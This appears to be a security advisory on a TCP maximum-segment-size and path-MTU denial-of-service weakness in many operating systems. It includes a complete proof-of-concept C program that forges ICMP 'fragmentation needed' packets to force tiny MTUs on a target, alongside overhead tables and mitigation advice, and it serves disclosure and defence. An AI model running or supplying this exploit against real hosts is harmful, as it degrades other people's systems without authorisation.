COMMAND

    TCP/IP

SYSTEMS AFFECTED

    most systems

PROBLEM

    Darren Reed found the following.  On a LAN far, far away, a rogue
    packet was heading towards a server, ready to start up a new
    storm ...

    If any of you have tested what happens to the ability of a box  to
    perform well when it  has a small MTU  you will know that  setting
    the MTU to (say)  56 on a diskless  thing is a VERY  VERY bad idea
    when NFS read/write packets are generally 8k in size.  Do not try
    it on an NFS thing unless you plan to reboot it, OK?  The last time
    Darren did this was when he worked out you could fragment packets
    inside the TCP header, and that lesson was enough for him.

    Following on from this, it occurs to me that the problem with  the
    above  can  possibly  be  reproduced  with  TCP.  How?  That thing
    called "maximum segment size".  The problem?  Well, the first is
    that there does not appear to be a minimum.  The second is that
    it is negotiated by the caller, not the callee.  Did we hear someone
    say "oh dear"?

    What does this mean?  Well, if we connect to www.microsoft.com and
    set our MSS to 143 (say), they need to send us 11 packets for
    every one they would normally send us (with an MSS of 1436).
    Total output for them is 1876 bytes instead of 1476, an increase
    of about 27%.  However, that's not the real problem.  Our experience
    is that hosts, especially PCs, have a lot of trouble handling *LOTS*
    of interrupts.  To send 2k out via the network, it's no longer 2
    packets but 20+, a significant increase in the workload.

    A quick table (based on a 20-byte IP header plus a 20-byte TCP
    header, i.e. 40 bytes of headers per packet):

        datalen    mss     packets     total bytes     %increase
        1436       1436       1           1476            0%
        1436       1024       2           1516            3%
        1436        768       2           1516            3%
        1436        512       3           1556            5%
        1436        256       6           1676           14%
        1436        128      12           1916           30%
        1436         64      23           2356           60%
        1436         32      45           3236          119%
        1436         28      52           3516          138% (MTU = 68)
        1436         16      90           5036          241%
        1436          8     180           8636          485%
        1436          1    1436          58876         3889%
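
    The figures in a table like the one above can be recomputed with a
    few lines of C.  This is only a sketch: it assumes a fixed 40 bytes
    of IP and TCP header per packet and no TCP options, and the function
    names are made up for illustration.

```c
#include <assert.h>
#include <stdio.h>

#define HDR_BYTES 40	/* 20-byte IP header + 20-byte TCP header, no options */

/* Number of segments needed to carry datalen bytes with the given MSS. */
long packets_for(long datalen, long mss)
{
	assert(datalen >= 0 && mss > 0);
	return (datalen + mss - 1) / mss;	/* round up */
}

/* Bytes on the wire: payload plus one set of headers per segment. */
long total_bytes(long datalen, long mss)
{
	return datalen + packets_for(datalen, mss) * HDR_BYTES;
}

/* Percentage increase over sending the data as one single segment. */
double pct_increase(long datalen, long mss)
{
	double base = (double)(datalen + HDR_BYTES);

	return 100.0 * ((double)total_bytes(datalen, mss) - base) / base;
}

/* Print one table row for each MSS value in the list. */
void print_table(long datalen, const long *mss, int n)
{
	int i;

	printf("datalen  mss  packets  total bytes  %%increase\n");
	for (i = 0; i < n; i++)
		printf("%7ld %4ld %8ld %12ld %9.0f%%\n", datalen, mss[i],
		    packets_for(datalen, mss[i]),
		    total_bytes(datalen, mss[i]),
		    pct_increase(datalen, mss[i]));
}
```

    Calling print_table(1436, list, n) with a list of MSS values prints
    one row per value; pct_increase() compares against a single segment,
    so it only makes sense when datalen fits in the normal MSS.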

    For Solaris,  you can  enforce a  more sane  minimum MSS  than the
    install default (1) with ndd:

        ndd -set /dev/tcp tcp_mss_min 128

    HP-UX 11.* is in the same basket as Solaris.

    *BSD have varying  minimums well above  1 - NetBSD  at 32, FreeBSD
    at 64.  (OpenBSD's comment on this says 32 but the code says 64).

    Linux 2.4 uses 88.

    We can't see anything in the registry or MSDN which says what it
    is for Windows.  By experimentation, Win2000 appears to be 88 and
    NT 4 appears to be 1.

    Nothing else  besides Solaris  seems to  have anything  close to a
    reasonable manner in which to tune the minimum value.  What's most
    surprising  is  that  there  does  not  appear  to be a documented
    minimum, just as there is no "minimum MTU" size for IP.  If  there
    is, please correct us.

    About the only bonus to this  is that there does not appear  to be
    an easy way to affect the MSS sent in the initial SYN packet.

    Oh, so how's this a potential denial of service attack?  Generally
    network efficiency comes through sending lots of large  packets...
    but don't tell ATM folks that, of course.  Does it work?   *shrug*
    It is not  easy to test...the  only testing Darren  could do (with
    NetBSD) was to use the TCP_MAXSEG setsockopt BUT this only affects
    the sending MSS (now what use is that?), but in testing, changing
    it from the default 1460 to 1 caused the number of packets to go from
    9 to 2260 to write 1436 bytes of data to discard.  To send 100 *
    1436 from the NetBSD  box to Solaris8 took  60 seconds (MSS of  1)
    vs  ~1  with  an  MSS  of  1460.   Of  even more significance, one
    connection like  this made  almost no  difference after  the first
    run but running a second saw kernel CPU jump to 30% on an SS20/712
    (we suspect there is some serious TCP tuning happening
    dynamically).  The sending host was likewise afflicted with a
    significant CPU usage penalty if more than one was running.  There
    were some  very surprising  things happening  too -  with just one
    session active,  ~170-200pps were  seen with  netstat on  Solaris,
    but with the  second, it was  between 1750 and  1850pps.  Can  you
    say "ACK storm"?  Oh, and for fun you can enable TCP  timestamping
    just to make those headers bigger and run the system a bit  harder
    whilst processing packets!
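
    The TCP_MAXSEG experiment described above comes down to a single
    setsockopt() call made on the socket before connect().  A minimal
    sketch follows; request_send_mss() and current_mss() are made-up
    helper names, and whether a given value is honoured depends on the
    stack (the text reports that NetBSD accepted 1; other systems may
    reject or clamp small values).

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

/*
 * Ask the stack to use `mss' as the maximum segment size on fd.
 * Intended to be called before connect().  Returns 0 on success,
 * -1 on failure with errno set by setsockopt().
 */
int request_send_mss(int fd, int mss)
{
	assert(mss > 0);
	return setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, &mss, sizeof(mss));
}

/*
 * Read back the MSS the stack currently reports for fd.
 * Returns the MSS, or -1 on failure.
 */
int current_mss(int fd)
{
	int mss = 0;
	socklen_t len = sizeof(mss);

	if (getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, &mss, &len) == -1)
		return -1;
	return mss;
}
```

    Comparing current_mss() before and after the request shows whether
    the stack accepted the value or quietly substituted its own.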

    Darren did not investigate the impact of ICMP PMTU discovery, but
    from his reading of at least the BSD source code, the MTU for  the
    route will  be ignored  if it  is less  than the  default MSS when
    sending out the TCP SYN with the MSS option.  That aside, it  will
    still impact current connections and  would appear to be a  way to
    force the _current_ MSS below that  set at connect time.  On  BSD,
    it will not accept  PMTU updates if the  MTU is less than  296, on
    Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm,  allows
    you to get an effective MSS of less than 88).
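
    The arithmetic behind an "effective MSS" is simple: the MTU covers
    the whole IP datagram, so the room left for TCP data is the MTU
    minus the IP header, the TCP header and any TCP options.  A small
    sketch, assuming 20-byte base headers; the names are hypothetical
    and the two floors are just the figures quoted above, not values
    read from any kernel source.

```c
#include <assert.h>

#define SK_IP_HDR	20	/* IP header without options */
#define SK_TCP_HDR	20	/* TCP header without options */

/* Floors as quoted in the text above (illustrative only). */
#define PMTU_FLOOR_BSD		296	/* BSD: MTU below 296 is not accepted */
#define PMTU_FLOOR_SOL_LINUX	69	/* Solaris8, Linux 2.4: must be above 68 */

/* TCP payload bytes that fit in one datagram of size mtu. */
int effective_mss(int mtu, int tcp_optlen)
{
	int mss;

	assert(mtu > 0 && tcp_optlen >= 0 && tcp_optlen <= 40);
	mss = mtu - SK_IP_HDR - SK_TCP_HDR - tcp_optlen;
	return mss > 0 ? mss : 0;
}

/* Would a PMTU update to `mtu' be accepted given this floor? */
int pmtu_update_accepted(int mtu, int floor)
{
	return mtu >= floor;
}
```

    For example, effective_mss(69, 12) gives 17: an MTU of 69 with 12
    bytes of TCP options leaves 17 bytes of data per packet, well below
    an MSS floor of 88.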

    /*
     * (C)Copyright 2001 Darren Reed.
     *
     * maxseg.c
     */
    #include <sys/types.h>
    #include <sys/param.h>
    #include <sys/socket.h>
    #if BSD >= 199306
    #include <sys/sysctl.h>
    #endif
    
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    #include <netinet/ip_var.h>
    #include <netinet/tcp.h>
    #include <netinet/tcp_timer.h>
    #include <netinet/tcp_var.h>
    
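    #include <sys/time.h>
    #include <arpa/inet.h>

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <time.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <err.h>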
    
    void prepare_icmp(struct sockaddr_in *);
    void primedefaultmss(int, int);
    u_short in_cksum(u_short *, int);
    int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);
    
    
    #define	NEW_MSS	512
    #define	NEW_MTU	1500
    static int start_mtu = NEW_MTU;
    
    void primedefaultmss(fd, mss)
    int fd, mss;
    {
    #ifdef __NetBSD__
	    static int defaultmss = 0;
	    int mib[4], msso, mssn;
	    size_t olen;
    
	    if (mss == 0)
		    mss = defaultmss;
	    mssn = mss;
	    olen = sizeof(msso);
    
	    mib[0] = CTL_NET;
	    mib[1] = AF_INET;
	    mib[2] = IPPROTO_TCP;
	    mib[3] = TCPCTL_MSSDFLT;
	    if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		    err(1, "sysctl");
	    if (defaultmss == 0)
		    defaultmss = msso;
    
	    if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		    err(1, "sysctl");
    
	    if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		    err(1, "sysctl");
    
	    printf("Default MSS: old %d new %d\n", msso, mssn);
    #endif
    
    #if HACKED_KERNEL
	    int op;
    
	    if (mss)
		    op = mss;
	    else
		    op = 512;
	    if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		    err(1, "setsockopt");
    #endif
    }
    
    
    int
    main(int argc, char *argv[])
    {
	    struct sockaddr_in me, them;
	    int fd, op, olen, mss;
	    char prebuf[16374];
	    time_t now1, now2;
	    struct timeval tv;
    
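	    /* expects: maxseg <target-ip> <target-port> */
	    if (argc < 3) {
		    fprintf(stderr, "usage: %s host port\n", argv[0]);
		    return 1;
	    }

	    mss = NEW_MSS;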
    
	    primedefaultmss(-1, mss);
    
	    fd = socket(AF_INET, SOCK_STREAM, 0);
	    if (fd == -1)
		    err(1, "socket");
    
	    memset((char *)&them, 0, sizeof(them));
	    them.sin_family = AF_INET;
	    them.sin_port = htons(atoi(argv[2]));	/* host to network order */
	    them.sin_addr.s_addr = inet_addr(argv[1]);
    
	    primedefaultmss(fd, mss);
    
	    op = fcntl(fd, F_GETFL, 0);
	    if (op != -1) {
		    op |= O_NONBLOCK;
		    fcntl(fd, F_SETFL, op);
	    }
    
	    op = 1;
	    /* TCP_NODELAY is a TCP-level option, not a SOL_SOCKET one */
	    (void) setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &op, sizeof(op));
    
	    if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	        (errno != EINPROGRESS))
		    err(1, "connect");
    
	    olen = sizeof(op);
	    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		    printf("Remote mss %d\n", op);
	    else
		    err(1, "getsockopt");
    
    #if HACKED_KERNEL
	    olen = sizeof(op);
	    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		    printf("Our mss %d\n", op);
	    else
		    err(1, "getsockopt(+1)");
    #endif
    
	    olen = sizeof(me);
	    if (getsockname(fd, (struct sockaddr *)&me, &olen))
		    err(1, "getsockname");
    
	    (void) read(fd, prebuf, sizeof(prebuf));
    
	    now1 = time(NULL);
	    for (op = 2; op; op--) {
		    icmp_unreach(&me, &them);
		    olen = read(fd, prebuf, sizeof(prebuf));
		    if (olen == -1) {
			    if (errno == ENOBUFS || errno == EAGAIN ||
			        errno == EWOULDBLOCK) {
				    tv.tv_sec = 0;
				    tv.tv_usec = 10000;
				    select(3, NULL, NULL, NULL, &tv);
				    continue;
			    }
			    warn("read");
			    break;
		    }
	    }
	    now2 = time(NULL);
	    printf("Elapsed time %ld\n", (long)(now2 - now1));
    
	    primedefaultmss(fd, 0);
	    close(fd);
	    return 0;
    }
    
    
    /*
     * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
     */
    static char icmpbuf[256];
    static int icmpsock = -1;
    static struct sockaddr_in destsock;
    
    void
    prepare_icmp(dst)
	     struct sockaddr_in *dst;
    {
	    struct tcphdr *tcp;
	    struct icmp *icmp;
    
	    icmp = (struct icmp *)icmpbuf;
    
	    if (icmpsock == -1) {
    
		    memset((char *)&destsock, 0, sizeof(destsock));
		    destsock.sin_family = AF_INET;
		    destsock.sin_addr = dst->sin_addr;
    
		    srand(getpid());
    
		    icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		    if (icmpsock == -1)
			    err(1, "socket");
    
		    /* the following messy stuff from Adam Glass (icmpsquish.c) */
		    memset(icmp, 0, sizeof(struct icmp) + 8);
		    icmp->icmp_type = ICMP_UNREACH;
		    icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		    icmp->icmp_pmvoid = 0;
    
		    icmp->icmp_ip.ip_v = IPVERSION;
		    icmp->icmp_ip.ip_hl = 5;
		    icmp->icmp_ip.ip_len = htons(NEW_MSS);
		    icmp->icmp_ip.ip_p = IPPROTO_TCP;
		    icmp->icmp_ip.ip_off = htons(IP_DF);
		    icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		    icmp->icmp_ip.ip_id = rand() & 0xffff;
    
		    icmp->icmp_ip.ip_src = dst->sin_addr;
    
		    tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		    tcp->th_sport = dst->sin_port;
	    }
	    icmp->icmp_nextmtu = htons(start_mtu);
	    icmp->icmp_cksum = 0;
    }
    
    
    u_short
    in_cksum(addr, len)
    u_short *addr;
    int len;
    {
	        register int nleft = len;
	        register u_short *w = addr;
	        register int sum = 0;
	        u_short answer = 0;
    
	        /*
	         *  Our algorithm is simple, using a 32 bit accumulator (sum),
	         *  we add sequential 16 bit words to it, and at the end, fold
	         *  back all the carry bits from the top 16 bits into the lower
	         *  16 bits.
	         */
	        while( nleft > 1 )  {
	                sum += *w++;
	                nleft -= 2;
	        }
    
	        /* mop up an odd byte, if necessary */
	        if( nleft == 1 ) {
	                *(u_char *)(&answer) = *(u_char *)w ;
	                sum += answer;
	        }
    
	        /*
	         * add back carry outs from top 16 bits to low 16 bits
	         */
	        sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
	        sum += (sum >> 16);                     /* add carry */
	        answer = ~sum;                          /* truncate to 16 bits */
	        return (answer);
    }
    
    int icmp_unreach(src, dst)
	     struct sockaddr_in *src, *dst;
    {
	    static int donecksum = 0;
	    struct sockaddr_in dest;
	    struct tcphdr *tcp;
	    struct icmp *icmp;
	    int i, rc;
	    u_short sum;
    
	    icmp = (struct icmp *)icmpbuf;
    
	    prepare_icmp(dst);
    
	    icmp->icmp_ip.ip_dst = src->sin_addr;
    
	    sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	    icmp->icmp_ip.ip_sum = sum;
    
	    tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	    tcp->th_dport = src->sin_port;
    
	    sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	    icmp->icmp_cksum = sum;
	    start_mtu /= 2;
	    if (start_mtu < 69)
		    start_mtu = 69;
    
	    i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		       (struct sockaddr *)&destsock, sizeof(destsock));
	    if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	        errno != EWOULDBLOCK)
		    err(1, "sendto");
	    return(0);
    }

    Some people do not seem to understand the difference between the TCP
    MSS and IP's MTU.  Either that, or both you and David LeBlanc are
    grasping at straws in order to make Windows NT look better.

    MTU and Path MTU  (PMTU) discovery are not  the same as TCP's  MSS
    but they can and do impact it.

    Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
    (sent lots of  data packets out  that had 1  byte of data)  and he
    got Win2000 to accept an MTU of 69 (effective MSS of 17 after  TCP
    options) through PMTU discovery.  Now, if 20+68 is the reason why
    88 is the minimum MSS Win2000 will accept, then someone doesn't
    understand what the word "MTU" means, because it refers to the
    TOTAL IP datagram length, not the data part.

    Using the C program above, one is able to get Win2000 to create an
    MTU-specific path to a local box where the MTU was 69.  That's
    well under any number over 500 (depending on how you choose to
    see the value).

    Path MTU discovery has absolutely no interaction with the TCP  MSS
    except  that  one  would  expect  it  to  be used if a cached path
    already existed to a host, with  an MTU specific for it set,  when
    initiating or accepting a new TCP connection.

SOLUTION

    Quite clearly the host operating  system needs to set a  much more
    sane minimum MSS than 1.  Given  there is no minimum MTU for IP  -
    well, maybe "68" - it's hard to derive what it should be.

    Anything below 40 should just be banned (that's the point at which
    you're transmitting 50% data, 50% headers).  Most of the defaults
    above are chosen because they fit in well with the system's internal
    network buffering (some use a default MSS of 512 rather than
    536 for similar reasons).  But above that, what do you choose?  80
    (one third headers, two thirds data), 120 for a 25/75 split, or
    something higher still?  Whatever the choice and however it is
    calculated, it is not enough to just enforce it when the MSS option
    is received.  It also needs to be enforced when the MTU parameter
    is checked in ICMP "need frag" packets.
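
    A minimal sketch of what enforcing a floor in both places might look
    like.  Nothing here is taken from a real kernel: TCP_MSS_FLOOR,
    clamp_peer_mss() and clamp_pmtu() are hypothetical names, the value
    128 is borrowed from the ndd example above rather than being a
    recommendation, and 40 bytes of IP and TCP header are assumed.  A
    stack could equally choose to ignore an undersized "need frag"
    message instead of clamping it.

```c
#include <assert.h>

#define TCP_MSS_FLOOR	128	/* assumed floor, for illustration only */
#define HDR_OVERHEAD	40	/* 20-byte IP + 20-byte TCP header */

/* Applied when the peer's MSS option arrives in a SYN. */
int clamp_peer_mss(int offered)
{
	return offered < TCP_MSS_FLOOR ? TCP_MSS_FLOOR : offered;
}

/*
 * Applied when an ICMP "need frag" message proposes a new path MTU.
 * Returns the MTU to record for the path, never low enough to push
 * the MSS under the floor.
 */
int clamp_pmtu(int next_hop_mtu)
{
	int min_mtu = TCP_MSS_FLOOR + HDR_OVERHEAD;

	return next_hop_mtu < min_mtu ? min_mtu : next_hop_mtu;
}

/* Share of a full-sized packet that is payload, in whole percent. */
int payload_percent(int mss)
{
	assert(mss > 0);
	return (100 * mss) / (mss + HDR_OVERHEAD);
}
```

    payload_percent() gives a quick way to compare candidate floors: an
    MSS of 40 yields 50% payload, and larger values improve from there.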